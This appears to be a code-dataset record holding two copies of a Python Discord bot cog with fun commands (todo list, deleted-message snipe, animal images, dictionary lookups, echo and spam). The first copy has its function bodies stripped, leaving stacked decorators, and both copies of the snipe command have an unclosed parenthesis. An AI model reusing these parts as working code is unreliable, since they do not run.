] | 7 | 2020-07-09T18:23:24.000Z | 2020-11-21T20:47:03.000Z | import json
import random
import string
from asyncio import TimeoutError
from datetime import datetime as dt
from io import BytesIO
from time import time
import discord
from PyDictionary import PyDictionary as dictionary
from discord.ext import commands, flags
from humanize import naturaltime as nt
from jikanpy import AioJikan
from sr_api import Client
from CyberTron5000.utils import (
paginator,
cyberformat
)
from CyberTron5000.utils.lists import (
INDICATOR_LETTERS,
ANIMALS,
EMOTIONS
)
class Fun(commands.Cog):
"""Fun commands"""
@commands.command()
async def horror(self, ctx, limit: int = 5):
"""spoopy"""
posts = []
async with self.bot.session.get(f"https://www.reddit.com/r/twosentencehorror/hot.json") as r:
res = await r.json()
for i in res['data']['children']:
posts.append(i['data'])
counter = 0
embeds = []
async with ctx.typing():
for s in random.sample(posts, len(posts)):
text = cyberformat.shorten(f"{s['title']}\n{s['selftext']}")
embeds.append(discord.Embed(description=text[:2000], colour=self.bot.colour))
counter += 1
if counter == limit:
break
else:
continue
p = paginator.CatchAllMenu(paginator.EmbedSource(embeds))
await p.start(ctx)
@commands.command()
async def pfpcycle(self, ctx):
"""if you're reading this it probably isnt your business"""
pfps = ['http://tinyurl.com/y8ccnxm3',
'https://images-ext-1.discordapp.net/external/6HjseNKji1C5wbK9Wb_jnIluzFWrCRW6xqhfboNtDDI/%3Fsize%3D1024/https/cdn.discordapp.com/avatars/350349365937700864/bbbff13a570231108b7afa383416b62a.png',
'http://tinyurl.com/ycjuvusq',
'https://cdn.discordapp.com/avatars/350349365937700864/f38bc11cf4360a9267a55962fcd71809.png?size=1024',
'https://media.discordapp.net/attachments/381963689470984203/732283634190516304/coolweavile.png?width=962&height=962',
'https://images-ext-1.discordapp.net/external/XVtT9nLyPYTWfNw4GSjvRMKibuKafi6_VCyVwSfW4C8/%3Fsize%3D1024/https/cdn.discordapp.com/avatars/350349365937700864/d027959b2a204f7587092a7a249e7377.png?width=962&height=962',
'https://media.discordapp.net/attachments/735325249138065468/735681377785348156/image0.png',
'https://media.discordapp.net/attachments/735325249138065468/735681378292596736/image1.png',
'https://media.discordapp.net/attachments/735325249138065468/735681378867478528/image2.png',
'https://media.discordapp.net/attachments/735325249138065468/735681379387441152/image3.png',
'https://media.discordapp.net/attachments/735325249138065468/735682125239681074/image0.png'
'http://i.some-random-api.ml/pokemon/weavile.png']
embeds = [discord.Embed(colour=self.bot.colour).set_image(url=p) for p in pfps]
a = paginator.CatchAllMenu(paginator.EmbedSource(embeds))
await a.start(ctx)
@commands.group(invoke_without_command=True, help="Replies with what you said and deletes your message.",
aliases=['say'])
@reply.command(invoke_without_command=True,
help="Replies with what you said and deletes your message, but in an embed.")
@reply.command(invoke_without_command=True,
help="Replies with what you said and deletes your message, but in a different channel.")
@reply.command(invoke_without_command=True, help="Replies with what you said and deletes your message, but UwU.")
@reply.command(help="🅱", invoke_without_command=True)
@reply.command(aliases=['msg'], help="Message a user something. ", invoke_without_command=True)
@reply.command(help="Spams a message.", invoke_without_command=True)
@reply.command(invoke_without_command=True, aliases=['emoji', 'em'])
async def indicator(self, ctx, *, message):
"""reply in emojis"""
msg = ''
letters = list(string.ascii_lowercase)
for x in message:
if x in letters:
msg += f':regional_indicator_{x}:'
else:
msg += INDICATOR_LETTERS.get(x, x)
await ctx.send('\u200b' + msg)
@reply.command()
async def mock(self, ctx, *, message):
"""Like that spongebob meme"""
await ctx.send(cyberformat.better_random_char(message))
@commands.command(help="Asks the mystical Ouija Board a question...")
@commands.command(aliases=['cf'], help="Flips a coin.")
@commands.command(help="How bigbrain are you? Find out.")
@commands.command(help="Ask the Bot about your peers")
@commands.group(invoke_without_command=True, aliases=["em"],
help="do an emoji from a different server that cybertron is in.")
@emoji.command()
@commands.command(aliases=['gt'])
async def greentext(self, ctx):
"""Write a greentext story"""
story = []
await ctx.send(
f"Greentext story starting! Type `{ctx.prefix}quit`, `{ctx.prefix}exit`, or `{ctx.prefix}finish` to see your final story!")
while True:
try:
msg = await self.bot.wait_for('message', timeout=300, check=lambda x: x.author == ctx.author)
if msg.content in (f'{ctx.prefix}quit', f'{ctx.prefix}exit', f'{ctx.prefix}finish'):
break
story.append(msg.content.replace('```', '\u200b'))
await msg.add_reaction(ctx.tick())
except TimeoutError:
break
story = '\n'.join([f'>{line}' for line in story])
return await ctx.send(embed=discord.Embed(colour=discord.Color.green(),
description=f"**{ctx.author}**'s story```css\n{story}\n```"))
@commands.command(aliases=['bin'])
async def binary(self, ctx, *, message):
"""Convert text to binary."""
binary = await self.sr.encode_binary(message)
await ctx.send(f"```py\n{binary}```")
@commands.command(aliases=['fb', 'from-bin'])
async def from_binary(self, ctx, *, binary):
"""Convert text from binary."""
binary = await self.sr.decode_binary(binary)
await ctx.send(binary)
@commands.command()
async def owner(self, ctx):
"""Shows you who made this bot"""
return await ctx.send(f"it is {self.bot.owner}")
@commands.command()
@commands.command(aliases=['choice'])
@commands.group(invoke_without_command=True)
async def todo(self, ctx):
"""Shows your current todo list"""
items = []
results = sorted((await self.get_all_todo(ctx.author.id)), key=lambda x: x['time'])
for each in results:
time = dt.utcfromtimestamp(each['time'])
since = nt(dt.utcnow() - time)
if each['description']:
desc_em = "❔"
else:
desc_em = ""
items.append(f"[{each['todo']}]({each['message_url']}) (ID: {each['id']} | Created {since}) {desc_em}")
source = paginator.IndexedListSource(data=items, embed=discord.Embed(colour=self.bot.colour),
title="Items (`❔` indicates that the todo has a description)", per_page=5)
menu = paginator.CatchAllMenu(source=source)
menu.add_info_fields({"❔": "Indicates that the todo has a description"})
await menu.start(ctx)
@todo.command()
async def add(self, ctx, *, todo):
"""Adds an item to your todo list"""
if len(todo) > 50:
return await ctx.send("Your todo is too long. Please be more consice.")
id = random.randint(1, 99999)
await self.bot.db.execute(
"INSERT INTO todo (todo, id, time, message_url, user_id) VALUES ($1, $2, $3, $4, $5)", todo, id, time(),
str(ctx.message.jump_url), ctx.author.id)
await ctx.send(f"{ctx.tick()} Inserted `{todo}` into your todo list! (ID: `{id}`)")
@todo.command(aliases=['rm', 'remove'])
async def resolve(self, ctx, *id: int):
"""Resolves an item from your todo list"""
items = await self.get_all_todo(ctx.author.id)
todos = [item[0] for item in items]
ids = [item[1] for item in items]
if any(item not in ids for item in id):
return await ctx.send("You passed in invalid id's!")
message = []
for i in id:
message.append(f"• {todos[ids.index(i)]}")
await self.bot.db.execute("DELETE FROM todo WHERE user_id = $1 AND id = $2", ctx.author.id, i)
await ctx.send(
f"{ctx.tick()} Deleted **{len(id)}** items from your todo list:\n" + "\n".join(message))
@todo.command()
async def list(self, ctx):
"""Shows your todo list"""
command = self.bot.get_command('todo')
await ctx.invoke(command)
@todo.command()
async def clear(self, ctx):
"""Clears all of your todos"""
num = len((await self.bot.db.fetch("SELECT * FROM todo WHERE user_id = $1", ctx.author.id)))
await self.bot.db.execute("DELETE FROM todo WHERE user_id = $1", ctx.author.id)
await ctx.send(f"{ctx.tick()} Deleted **{num}** items from your todo list!")
@todo.command(aliases=['show'])
async def info(self, ctx, id: int):
"""Shows you info on a todo"""
results = await self.bot.db.fetch("SELECT * FROM todo WHERE id = $1", id)
if not results:
raise commands.BadArgument(f'{id} is not a valid todo!')
results = results[0]
embed = discord.Embed(colour=self.bot.colour)
embed.title = f"{results['todo']} » `{results['id']}`"
time = dt.utcfromtimestamp(results['time'])
since = nt(dt.utcnow() - time)
embed.description = f'{results["description"] or ""}\n'
embed.description += f"<:clock:738186842343735387> **{since}**\n"
embed.description += f"**{time.strftime('%A %B %d, %Y at %I:%M %p')}**"
await ctx.send(embed=embed)
@todo.command(aliases=['add_desc', 'ad'])
async def describe(self, ctx, id: int, *, description):
"""Add a description for your todo"""
results = await self.bot.db.fetch("SELECT * FROM todo WHERE id = $1", id)
if not results:
raise commands.BadArgument(f'{id} is not a valid todo!')
if len(description) > 250:
return await ctx.send("That description is too long!")
await self.bot.db.execute("UPDATE todo SET description = $1 WHERE id = $2", description, id)
await ctx.send(
f"{ctx.tick()} Set todo description for `{id}` ({results[0]['todo']}) to `{description}`")
@flags.add_flag("--limit", type=int, default=500)
@flags.add_flag("--channel", type=discord.TextChannel)
@flags.command()
async def snipe(self, ctx, **flags):
"""Shows the most recently deleted messages in a given channel"""
# i know i shouldnt be using json for this
channel = flags.get('channel') or ctx.channel
with open('./json_files/snipes.json', 'r') as f:
snipes = json.load(f)
try:
channel_snipes = snipes[str(channel.id)]
except KeyError:
return await ctx.send(f"{channel} has no deleted messages.")
embeds = []
for snipe in reversed(channel_snipes[:flags.get('limit')]):
try:
author = self.bot.get_user(int(snipe['author'])) or await self.bot.fetch_user(int(snipe['author'])
img = author.avatar_url
except:
author = "Unknown User"
img = "https://media.discordapp.net/attachments/740678305237303454/866900622271971348/avvy.png"
embed = discord.Embed(colour=self.bot.colour)
desc = snipe['content']
if not desc and snipe.get('embed'):
desc = '`<Embedded Message>`'
embed.description = desc
since = dt.strptime(snipe['created_at'], '%Y-%m-%d %H:%M:%S.%f')
embed.set_author(name=f"{author} said in {str(channel)}", icon_url=img)
embed.timestamp = since
embeds.append(embed)
source = paginator.EmbedSource(embeds, footer=False)
await paginator.CatchAllMenu(source).start(ctx)
@commands.command(aliases=['af'])
async def animalfact(self, ctx, animal=None):
"""Shows a fact about an animal of your choice."""
if not animal:
return await ctx.send(
f"**Valid Animal Choices:**\ncat, dog, koala, fox, bird, elephant, panda, racoon, kangaroo, giraffe, whale")
try:
animal = str(animal).lower().replace(' ', '_')
em = ANIMALS.get(animal)
fact = await self.sr.get_fact(animal)
await ctx.send(f"{em} **Random {animal.replace('_', ' ').title()} Fact:**\n{fact}")
except Exception as error:
return await ctx.send(error)
async def get_attachement(self, image_url: str, ext='png') -> discord.File:
"""Gives you a valid image attachment of any url"""
async with self.bot.session.get(image_url) as r:
data = await r.read()
image = BytesIO(data)
return discord.File(image, filename=f'image.{ext}')
@commands.command()
async def inspiration(self, ctx):
"""Get inspired"""
async with self.bot.session.get('https://inspirobot.me/api?generate=true') as r:
data = await r.text()
file = await self.get_attachement(data)
await ctx.send(content=f"**Inspiration**", file=file)
@commands.command(aliases=['aimg'])
async def animalimg(self, ctx, *, animal=None):
"""Shows an image of an animal of your choice."""
if not animal:
return await ctx.send(
f"**Valid Animal Choices:**\ncat, dog, koala, fox, birb, red panda, panda, racoon, kangaroo")
try:
async with ctx.typing():
animal = str(animal).lower().replace(' ', '_')
image = await self.sr.get_image(animal)
file = await self.get_attachement(image.url)
await ctx.send(f"{ANIMALS.get(animal, '')} **Random {animal.replace('_', ' ').title()} Image:**",
file=file)
except Exception as error:
return await ctx.send(error)
@commands.command()
@commands.command()
@commands.command()
@commands.command()
@commands.command()
async def dog(self, ctx):
"""Shows you an image of a dog."""
async with self.bot.session.get('https://dog.ceo/api/breeds/image/random') as r, ctx.typing():
data = await r.json()
file = await self.get_attachement(data['message'])
await ctx.send(f"{ANIMALS.get('dog')} **Random Dog Image**", file=file)
@commands.group(aliases=['dictionary'], invoke_without_command=True)
async def word(self, ctx, *, word):
"""Fetch a word's definition"""
# thanks to deviljamjar for this idea
# find the original here: https://github.com/DevilJamJar/DevilBot/blob/master/cogs/utility.py/#L48-#L65
async with ctx.typing():
try:
ret = await self.bot.loop.run_in_executor(None, self._dictionary.meaning, word)
except Exception as error:
raise error
embed = discord.Embed(colour=self.bot.colour, title=word.lower())
if not ret:
raise commands.BadArgument("this word was not found in the dictionary!")
embed.description = self.format_meanings(ret)
await ctx.send(embed=embed)
@word.command(aliases=['syn'])
async def synonyms(self, ctx, *, word):
"""Shows you the synonyms of a word."""
async with ctx.typing():
try:
ret = await self.bot.loop.run_in_executor(None, self._dictionary.synonym, word)
except Exception as error:
raise error
embed = discord.Embed(colour=self.bot.colour, title=word.lower())
embed.description = ', '.join(ret)
await ctx.send(embed=embed)
@word.command(aliases=['ant'])
async def antonyms(self, ctx, *, word):
"""Shows you the antonyms of a word."""
async with ctx.typing():
try:
ret = await self.bot.loop.run_in_executor(None, self._dictionary.antonym, word)
except Exception as error:
raise error
embed = discord.Embed(colour=self.bot.colour, title=word.lower())
embed.description = ', '.join(ret)
await ctx.send(embed=embed)
@word.command()
async def many(self, ctx, *words):
"""Get information on many words"""
command = self.bot.get_command('words')
await ctx.invoke(command, *words)
@commands.command()
async def words(self, ctx, *words):
"""Get information on many words"""
async with ctx.typing():
_dict = dictionary(*words)
try:
ret = await self.bot.loop.run_in_executor(None, _dict.getMeanings)
except Exception as error:
raise error
embed = discord.Embed(colour=self.bot.colour)
embed.title = "Words"
not_found = list()
for word in words:
meanings = ret.get(word)
if not meanings:
not_found.append(word)
continue
embed.add_field(name=word.lower(), value=self.format_meanings(meanings))
if not_found:
embed.set_footer(text=', '.join(not_found) + " were not found.")
try:
await ctx.send(embed=embed)
except discord.HTTPException:
return await ctx.send("You passed in too many words!")
@commands.command()
async def ship(self, ctx, member_1: discord.Member, member_2: discord.Member):
"""Ship 2 members"""
from random import randint
rate = randint(1, 100)
await ctx.send(f"""**{member_1}** | <a:hug:748315930685210746> {rate}% :heart: | **{member_2}**""")
def setup(bot):
bot.add_cog(Fun(bot))
| 45.030576 | 232 | 0.591724 | import json
import random
import string
from asyncio import TimeoutError
from datetime import datetime as dt
from io import BytesIO
from time import time
import discord
from PyDictionary import PyDictionary as dictionary
from discord.ext import commands, flags
from humanize import naturaltime as nt
from jikanpy import AioJikan
from sr_api import Client
from CyberTron5000.utils import (
paginator,
cyberformat
)
from CyberTron5000.utils.lists import (
INDICATOR_LETTERS,
ANIMALS,
EMOTIONS
)
class Fun(commands.Cog):
"""Fun commands"""
def __init__(self, bot):
self.bot = bot
self.sr = Client()
self._dictionary = dictionary()
@commands.command()
async def horror(self, ctx, limit: int = 5):
"""spoopy"""
posts = []
async with self.bot.session.get(f"https://www.reddit.com/r/twosentencehorror/hot.json") as r:
res = await r.json()
for i in res['data']['children']:
posts.append(i['data'])
counter = 0
embeds = []
async with ctx.typing():
for s in random.sample(posts, len(posts)):
text = cyberformat.shorten(f"{s['title']}\n{s['selftext']}")
embeds.append(discord.Embed(description=text[:2000], colour=self.bot.colour))
counter += 1
if counter == limit:
break
else:
continue
p = paginator.CatchAllMenu(paginator.EmbedSource(embeds))
await p.start(ctx)
@commands.command()
async def pfpcycle(self, ctx):
"""if you're reading this it probably isnt your business"""
pfps = ['http://tinyurl.com/y8ccnxm3',
'https://images-ext-1.discordapp.net/external/6HjseNKji1C5wbK9Wb_jnIluzFWrCRW6xqhfboNtDDI/%3Fsize%3D1024/https/cdn.discordapp.com/avatars/350349365937700864/bbbff13a570231108b7afa383416b62a.png',
'http://tinyurl.com/ycjuvusq',
'https://cdn.discordapp.com/avatars/350349365937700864/f38bc11cf4360a9267a55962fcd71809.png?size=1024',
'https://media.discordapp.net/attachments/381963689470984203/732283634190516304/coolweavile.png?width=962&height=962',
'https://images-ext-1.discordapp.net/external/XVtT9nLyPYTWfNw4GSjvRMKibuKafi6_VCyVwSfW4C8/%3Fsize%3D1024/https/cdn.discordapp.com/avatars/350349365937700864/d027959b2a204f7587092a7a249e7377.png?width=962&height=962',
'https://media.discordapp.net/attachments/735325249138065468/735681377785348156/image0.png',
'https://media.discordapp.net/attachments/735325249138065468/735681378292596736/image1.png',
'https://media.discordapp.net/attachments/735325249138065468/735681378867478528/image2.png',
'https://media.discordapp.net/attachments/735325249138065468/735681379387441152/image3.png',
'https://media.discordapp.net/attachments/735325249138065468/735682125239681074/image0.png'
'http://i.some-random-api.ml/pokemon/weavile.png']
embeds = [discord.Embed(colour=self.bot.colour).set_image(url=p) for p in pfps]
a = paginator.CatchAllMenu(paginator.EmbedSource(embeds))
await a.start(ctx)
@commands.group(invoke_without_command=True, help="Replies with what you said and deletes your message.",
aliases=['say'])
async def reply(self, ctx, *, message):
await ctx.send(message)
@reply.command(invoke_without_command=True,
help="Replies with what you said and deletes your message, but in an embed.")
async def embed(self, ctx, *, message):
await ctx.send(embed=discord.Embed(title=message, colour=self.bot.colour))
@reply.command(invoke_without_command=True,
help="Replies with what you said and deletes your message, but in a different channel.")
async def echo(self, ctx, channel: discord.TextChannel, *, message):
await channel.send(message)
await ctx.message.add_reaction(emoji=ctx.tick())
@reply.command(invoke_without_command=True, help="Replies with what you said and deletes your message, but UwU.")
async def owo(self, ctx, *, message):
await ctx.send(cyberformat.hyper_replace(text=message, old=['r', 'l', 'R', 'L'], new=['w', 'w', "W", "W"]))
@reply.command(help="🅱", invoke_without_command=True)
async def b(self, ctx, *, message):
await ctx.send(cyberformat.hyper_replace(text=message, old=['b', 'B', 'D', 'd'], new=['🅱', '🅱', "🅱", "🅱"]))
@reply.command(aliases=['msg'], help="Message a user something. ", invoke_without_command=True)
async def message(self, ctx, user: discord.Member, *, message):
person = self.bot.get_user(user.id)
await person.send(f"{message}\n\n*(Sent by {ctx.message.author})*")
await ctx.message.add_reaction(emoji=ctx.tick())
@reply.command(help="Spams a message.", invoke_without_command=True)
async def spam(self, ctx, *, message):
await ctx.send(f"{message} " * 15)
@reply.command(invoke_without_command=True, aliases=['emoji', 'em'])
async def indicator(self, ctx, *, message):
"""reply in emojis"""
msg = ''
letters = list(string.ascii_lowercase)
for x in message:
if x in letters:
msg += f':regional_indicator_{x}:'
else:
msg += INDICATOR_LETTERS.get(x, x)
await ctx.send('\u200b' + msg)
@reply.command()
async def mock(self, ctx, *, message):
"""Like that spongebob meme"""
await ctx.send(cyberformat.better_random_char(message))
@commands.command(help="Asks the mystical Ouija Board a question...")
async def askouija(self, ctx, *, question):
ouija_responses = [
'Help',
'Bruh',
'dumb',
'You dumb',
'Hey gamers'
'Infinity',
'God damn ur ugly',
'Gamers',
'Gamers Unite',
'Fricken amateur',
'Fricken doofus',
'Yo',
'Joe mama',
'No',
'yes',
'perhaps',
'Waluigi',
'Bruh Moment',
'Moment of the Bruh',
'Puh-leaze',
'Vibe Check']
ouija_choice = random.choice(ouija_responses)
ouija_says = str("You asked me... '_{}_'... I respond... {}".format(question, ouija_choice))
await ctx.send(ouija_says)
@commands.command(aliases=['cf'], help="Flips a coin.")
async def coinflip(self, ctx, *, clause: str = None):
tails = discord.Embed(title="Tails!", colour=self.bot.colour).set_image(
url='https://upload.wikimedia.org/wikipedia/en/thumb/3/37/Quarter_Reverse_2010.png/220px-Quarter_Reverse_2010.png')
heads = discord.Embed(title="Heads!", colour=self.bot.colour).set_image(
url='https://upload.wikimedia.org/wikipedia/en/thumb/8/8a/Quarter_Obverse_2010.png/220px-Quarter_Obverse_2010.png')
embed = random.choice([heads, tails])
embed.set_author(name=clause, icon_url=ctx.author.avatar_url) if clause else None
await ctx.send(embed=embed)
@commands.command(help="How bigbrain are you? Find out.")
async def iq(self, ctx, *, member: discord.Member = None):
member = member or ctx.message.author
embed = discord.Embed(
colour=self.bot.colour, title='IQ Rating Machine <:bigbrain:703735142509969408>',
timestamp=ctx.message.created_at
)
embed.set_author(name="{}".format(member.display_name), icon_url=member.avatar_url)
embed.add_field(name="What is your IQ?",
value=f"{member.display_name} has an IQ of {random.randint(1, 101)}.")
await ctx.send(embed=embed)
@commands.command(help="Ask the Bot about your peers")
async def who(self, ctx, *, question=None):
member = random.choice(ctx.guild.members)
embed = discord.Embed(
colour=self.bot.colour,
title=f"Answer: {member.display_name}",
)
question = question or "?"
embed.set_author(name="Who " + question)
embed.set_image(url=member.avatar_url)
await ctx.send(embed=embed)
@commands.group(invoke_without_command=True, aliases=["em"],
help="do an emoji from a different server that cybertron is in.")
async def emoji(self, ctx, *emoji: discord.Emoji):
a = []
for item in emoji:
a.append(self.bot.get_emoji(item.id))
await ctx.send("".join([str(a) for a in a]))
@emoji.command()
async def url(self, ctx, *emoji: discord.Emoji):
a = []
for item in emoji:
a.append(self.bot.get_emoji(item.id))
await ctx.send(" ".join([str(a.url) for a in a]))
@commands.command(aliases=['gt'])
async def greentext(self, ctx):
"""Write a greentext story"""
story = []
await ctx.send(
f"Greentext story starting! Type `{ctx.prefix}quit`, `{ctx.prefix}exit`, or `{ctx.prefix}finish` to see your final story!")
while True:
try:
msg = await self.bot.wait_for('message', timeout=300, check=lambda x: x.author == ctx.author)
if msg.content in (f'{ctx.prefix}quit', f'{ctx.prefix}exit', f'{ctx.prefix}finish'):
break
story.append(msg.content.replace('```', '\u200b'))
await msg.add_reaction(ctx.tick())
except TimeoutError:
break
story = '\n'.join([f'>{line}' for line in story])
return await ctx.send(embed=discord.Embed(colour=discord.Color.green(),
description=f"**{ctx.author}**'s story```css\n{story}\n```"))
@commands.command(aliases=['bin'])
async def binary(self, ctx, *, message):
"""Convert text to binary."""
binary = await self.sr.encode_binary(message)
await ctx.send(f"```py\n{binary}```")
@commands.command(aliases=['fb', 'from-bin'])
async def from_binary(self, ctx, *, binary):
"""Convert text from binary."""
binary = await self.sr.decode_binary(binary)
await ctx.send(binary)
@commands.command()
async def owner(self, ctx):
"""Shows you who made this bot"""
return await ctx.send(f"it is {self.bot.owner}")
@commands.command()
async def anime(self, ctx, *, query):
async with AioJikan() as a:
naruto = await a.search(search_type='anime', query=query)
res = naruto['results'][0]
o = []
embed = discord.Embed(color=self.bot.colour)
embed.set_thumbnail(url=res['image_url'])
embed.title = f"{res['title']}"
embed.url = f"{res['url']}"
embed.description = f"{naruto['results'][0]['synopsis']}"
embed.add_field(name="Info",
value=f"Type | **{res['type']}**\n📺 | **{res['episodes']}**\n:star:️ | **{res['score']}**\n<:member:731190477927219231> | **{res['members']:,}**")
for x in range(2, len(naruto['results'])):
o.append(f"**{naruto['results'][x]['title']}**")
embed.add_field(name="Other Entries", value=f"\n".join(o[:5]))
await ctx.send(embed=embed)
@commands.command(aliases=['choice'])
async def chose(self, ctx, *choices):
await ctx.send(random.choice(choices))
async def get_all_todo(self, id: int = None):
if not id:
return await self.bot.db.fetch("SELECT * FROM todo")
else:
return await self.bot.db.fetch("SELECT * FROM todo WHERE user_id = $1", id)
@commands.group(invoke_without_command=True)
async def todo(self, ctx):
"""Shows your current todo list"""
items = []
results = sorted((await self.get_all_todo(ctx.author.id)), key=lambda x: x['time'])
for each in results:
time = dt.utcfromtimestamp(each['time'])
since = nt(dt.utcnow() - time)
if each['description']:
desc_em = "❔"
else:
desc_em = ""
items.append(f"[{each['todo']}]({each['message_url']}) (ID: {each['id']} | Created {since}) {desc_em}")
source = paginator.IndexedListSource(data=items, embed=discord.Embed(colour=self.bot.colour),
title="Items (`❔` indicates that the todo has a description)", per_page=5)
menu = paginator.CatchAllMenu(source=source)
menu.add_info_fields({"❔": "Indicates that the todo has a description"})
await menu.start(ctx)
@todo.command()
async def add(self, ctx, *, todo):
"""Adds an item to your todo list"""
if len(todo) > 50:
return await ctx.send("Your todo is too long. Please be more consice.")
id = random.randint(1, 99999)
await self.bot.db.execute(
"INSERT INTO todo (todo, id, time, message_url, user_id) VALUES ($1, $2, $3, $4, $5)", todo, id, time(),
str(ctx.message.jump_url), ctx.author.id)
await ctx.send(f"{ctx.tick()} Inserted `{todo}` into your todo list! (ID: `{id}`)")
@todo.command(aliases=['rm', 'remove'])
async def resolve(self, ctx, *id: int):
"""Resolves an item from your todo list"""
items = await self.get_all_todo(ctx.author.id)
todos = [item[0] for item in items]
ids = [item[1] for item in items]
if any(item not in ids for item in id):
return await ctx.send("You passed in invalid id's!")
message = []
for i in id:
message.append(f"• {todos[ids.index(i)]}")
await self.bot.db.execute("DELETE FROM todo WHERE user_id = $1 AND id = $2", ctx.author.id, i)
await ctx.send(
f"{ctx.tick()} Deleted **{len(id)}** items from your todo list:\n" + "\n".join(message))
@todo.command()
async def list(self, ctx):
"""Shows your todo list"""
command = self.bot.get_command('todo')
await ctx.invoke(command)
@todo.command()
async def clear(self, ctx):
"""Clears all of your todos"""
num = len((await self.bot.db.fetch("SELECT * FROM todo WHERE user_id = $1", ctx.author.id)))
await self.bot.db.execute("DELETE FROM todo WHERE user_id = $1", ctx.author.id)
await ctx.send(f"{ctx.tick()} Deleted **{num}** items from your todo list!")
@todo.command(aliases=['show'])
async def info(self, ctx, id: int):
"""Shows you info on a todo"""
results = await self.bot.db.fetch("SELECT * FROM todo WHERE id = $1", id)
if not results:
raise commands.BadArgument(f'{id} is not a valid todo!')
results = results[0]
embed = discord.Embed(colour=self.bot.colour)
embed.title = f"{results['todo']} » `{results['id']}`"
time = dt.utcfromtimestamp(results['time'])
since = nt(dt.utcnow() - time)
embed.description = f'{results["description"] or ""}\n'
embed.description += f"<:clock:738186842343735387> **{since}**\n"
embed.description += f"**{time.strftime('%A %B %d, %Y at %I:%M %p')}**"
await ctx.send(embed=embed)
@todo.command(aliases=['add_desc', 'ad'])
async def describe(self, ctx, id: int, *, description):
"""Add a description for your todo"""
results = await self.bot.db.fetch("SELECT * FROM todo WHERE id = $1", id)
if not results:
raise commands.BadArgument(f'{id} is not a valid todo!')
if len(description) > 250:
return await ctx.send("That description is too long!")
await self.bot.db.execute("UPDATE todo SET description = $1 WHERE id = $2", description, id)
await ctx.send(
f"{ctx.tick()} Set todo description for `{id}` ({results[0]['todo']}) to `{description}`")
@flags.add_flag("--limit", type=int, default=500)
@flags.add_flag("--channel", type=discord.TextChannel)
@flags.command()
async def snipe(self, ctx, **flags):
"""Shows the most recently deleted messages in a given channel"""
# i know i shouldnt be using json for this
channel = flags.get('channel') or ctx.channel
with open('./json_files/snipes.json', 'r') as f:
snipes = json.load(f)
try:
channel_snipes = snipes[str(channel.id)]
except KeyError:
return await ctx.send(f"{channel} has no deleted messages.")
embeds = []
for snipe in reversed(channel_snipes[:flags.get('limit')]):
try:
author = self.bot.get_user(int(snipe['author'])) or await self.bot.fetch_user(int(snipe['author'])
img = author.avatar_url
except:
author = "Unknown User"
img = "https://media.discordapp.net/attachments/740678305237303454/866900622271971348/avvy.png"
embed = discord.Embed(colour=self.bot.colour)
desc = snipe['content']
if not desc and snipe.get('embed'):
desc = '`<Embedded Message>`'
embed.description = desc
since = dt.strptime(snipe['created_at'], '%Y-%m-%d %H:%M:%S.%f')
embed.set_author(name=f"{author} said in {str(channel)}", icon_url=img)
embed.timestamp = since
embeds.append(embed)
source = paginator.EmbedSource(embeds, footer=False)
await paginator.CatchAllMenu(source).start(ctx)
@commands.command(aliases=['af'])
async def animalfact(self, ctx, animal=None):
"""Shows a fact about an animal of your choice."""
if not animal:
return await ctx.send(
f"**Valid Animal Choices:**\ncat, dog, koala, fox, bird, elephant, panda, racoon, kangaroo, giraffe, whale")
try:
animal = str(animal).lower().replace(' ', '_')
em = ANIMALS.get(animal)
fact = await self.sr.get_fact(animal)
await ctx.send(f"{em} **Random {animal.replace('_', ' ').title()} Fact:**\n{fact}")
except Exception as error:
return await ctx.send(error)
async def get_attachement(self, image_url: str, ext='png') -> discord.File:
"""Gives you a valid image attachment of any url"""
async with self.bot.session.get(image_url) as r:
data = await r.read()
image = BytesIO(data)
return discord.File(image, filename=f'image.{ext}')
@commands.command()
async def inspiration(self, ctx):
"""Get inspired"""
async with self.bot.session.get('https://inspirobot.me/api?generate=true') as r:
data = await r.text()
file = await self.get_attachement(data)
await ctx.send(content=f"**Inspiration**", file=file)
@commands.command(aliases=['aimg'])
async def animalimg(self, ctx, *, animal=None):
"""Shows an image of an animal of your choice."""
if not animal:
return await ctx.send(
f"**Valid Animal Choices:**\ncat, dog, koala, fox, birb, red panda, panda, racoon, kangaroo")
try:
async with ctx.typing():
animal = str(animal).lower().replace(' ', '_')
image = await self.sr.get_image(animal)
file = await self.get_attachement(image.url)
await ctx.send(f"{ANIMALS.get(animal, '')} **Random {animal.replace('_', ' ').title()} Image:**",
file=file)
except Exception as error:
return await ctx.send(error)
@commands.command()
async def hug(self, ctx, member: discord.Member):
async with ctx.typing():
image = await self.sr.get_gif('hug')
file = await self.get_attachement(image.url, 'gif')
await ctx.send(f"{EMOTIONS['hug']} **{ctx.author.display_name}** hugged **{member.display_name}**!", file=file)
@commands.command()
async def pat(self, ctx, member: discord.Member):
async with ctx.typing():
image = await self.sr.get_gif('pat')
file = await self.get_attachement(image.url, 'gif')
await ctx.send(f"{EMOTIONS['pat']} **{ctx.author.display_name}** patted **{member.display_name}**!", file=file)
@commands.command()
async def facepalm(self, ctx):
async with ctx.typing():
image = await self.sr.get_gif('face-palm')
file = await self.get_attachement(image.url, 'gif')
await ctx.send(f"{EMOTIONS['face-palm']} **{ctx.author.display_name}** facepalmed!", file=file)
@commands.command()
async def wink(self, ctx):
async with ctx.typing():
image = await self.sr.get_gif('wink')
file = await self.get_attachement(image.url, 'gif')
await ctx.send(f"{EMOTIONS['wink']} **{ctx.author.display_name}** winked!", file=file)
@commands.command()
async def dog(self, ctx):
"""Shows you an image of a dog."""
async with self.bot.session.get('https://dog.ceo/api/breeds/image/random') as r, ctx.typing():
data = await r.json()
file = await self.get_attachement(data['message'])
await ctx.send(f"{ANIMALS.get('dog')} **Random Dog Image**", file=file)
def format_meanings(self, ret: dict) -> str:
message = ''
for index, value in ret.items():
message += f"\n**{index}**\n"
for num, _def in enumerate(value, 1):
message += f"[{num}] {_def}\n"
return message
@commands.group(aliases=['dictionary'], invoke_without_command=True)
async def word(self, ctx, *, word):
"""Fetch a word's definition"""
# thanks to deviljamjar for this idea
# find the original here: https://github.com/DevilJamJar/DevilBot/blob/master/cogs/utility.py/#L48-#L65
async with ctx.typing():
try:
ret = await self.bot.loop.run_in_executor(None, self._dictionary.meaning, word)
except Exception as error:
raise error
embed = discord.Embed(colour=self.bot.colour, title=word.lower())
if not ret:
raise commands.BadArgument("this word was not found in the dictionary!")
embed.description = self.format_meanings(ret)
await ctx.send(embed=embed)
@word.command(aliases=['syn'])
async def synonyms(self, ctx, *, word):
"""Shows you the synonyms of a word."""
async with ctx.typing():
try:
ret = await self.bot.loop.run_in_executor(None, self._dictionary.synonym, word)
except Exception as error:
raise error
